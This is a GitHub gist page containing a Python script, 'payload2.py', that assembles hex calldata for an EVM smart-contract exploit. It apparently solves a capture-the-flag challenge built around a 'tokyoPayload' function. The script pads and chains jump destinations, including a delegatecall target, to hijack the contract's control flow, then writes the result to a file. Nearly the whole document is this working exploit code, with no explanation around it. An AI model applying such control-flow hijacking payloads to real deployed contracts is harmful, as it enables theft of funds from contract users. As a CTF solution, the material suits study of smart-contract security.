Skip to content

Instantly share code, notes, and snippets.

@kangsangsoo

kangsangsoo/payload2.py

Created September 22, 2023 08:45
Show Gist options
  • Save kangsangsoo/3da37c9c95053436e74da8a9f98dfcfe to your computer and use it in GitHub Desktop.
Save kangsangsoo/3da37c9c95053436e74da8a9f98dfcfe to your computer and use it in GitHub Desktop.
Download ZIP
Raw
payload2.py
JUMPDEST_RET_FUNCS = "018f"
JUMPDEST_LOAD = "d0"
JUMPDEST_GASLIMIT = "0153"
JUMPDEST_POP_4 = "018f"
JUMPDEST_DELEGATE = "01a3"
x = "01c2"
l = "371d"
DUMMY = "DE"
SIG_tokyoPayload = "000040c3"
payload = SIG_tokyoPayload # func sig
payload += "7b".rjust(64, "0") # x
payload += JUMPDEST_LOAD.rjust(64, "0") # y => first call pointer and second call addr
payload += DUMMY * 1 # align
payload += DUMMY * (int(JUMPDEST_RET_FUNCS, 16) - len(payload) // 2)
payload += "aa" * 32
payload += JUMPDEST_LOAD.rjust(64, "0") # third call
payload += hex(len(payload)//2 + 32)[2:].rjust(64, "0") # second call's arg0 => i
payload += "bb" * 32
payload += JUMPDEST_GASLIMIT.rjust(64, "0") # fourth call
payload += hex(len(payload)//2 + 32)[2:].rjust(64, "0").rjust(64, "0") # third call's arg0 => i
payload += "cc" * 32
payload += JUMPDEST_DELEGATE.rjust(64, "0") # fifth-call arg0 => x => seventh-call
payload += x.rjust(64, "0") # fifth-call arg1 => y
payload += DUMMY * ((int(JUMPDEST_LOAD, 16)) * 0x20 - len(payload) // 2 + 5)
assert len(payload) // 2 == (int(JUMPDEST_LOAD, 16))* 0x20 + 5
payload += JUMPDEST_LOAD.rjust(64, "0") # first call addr
print(len(payload))
# pop x 4
# 0x1a3 + l - 0x80 = 0x20 * x
# l > len(payload)
# x = 450(0x1c2) => l = 14109(0x371d)
payload += DUMMY * (int(l, 16) - len(payload) // 2)
assert len(payload) // 2 == (int(l, 16))
payload += JUMPDEST_POP_4.rjust(64, "0") # sixth-call
open("pay.txt","w").write(payload)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment